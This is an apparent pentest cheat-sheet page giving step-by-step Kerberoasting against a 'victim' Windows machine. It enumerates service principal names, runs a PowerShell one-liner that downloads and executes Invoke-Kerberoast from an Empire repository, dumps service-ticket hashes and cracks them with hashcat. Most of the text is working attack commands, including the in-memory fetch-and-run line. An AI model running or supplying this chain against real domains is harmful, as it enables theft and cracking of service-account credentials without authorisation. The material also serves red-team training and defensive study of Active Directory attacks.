Kerberoasting using Powershell
Overview #
This will request a service ticket for an account and acquire a hash using powershell.
Requirement #
- You have access to the victim’s windows machine
- Powershell is installed
Steps #
- Extract SPNs (mapping between service and account)
setspn -T medin -Q */*
- Get powershell script
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')
- Run script and copy hash to attacker’s machine
Invoke-Kerberoast -OutputFormat hashcat |fl
- Sample output
- Crack hash using hashcat (mode kerberos 5 TGS-REP etype 23)
hashcat -m 13100 - a 0 hash.txt wordlist --force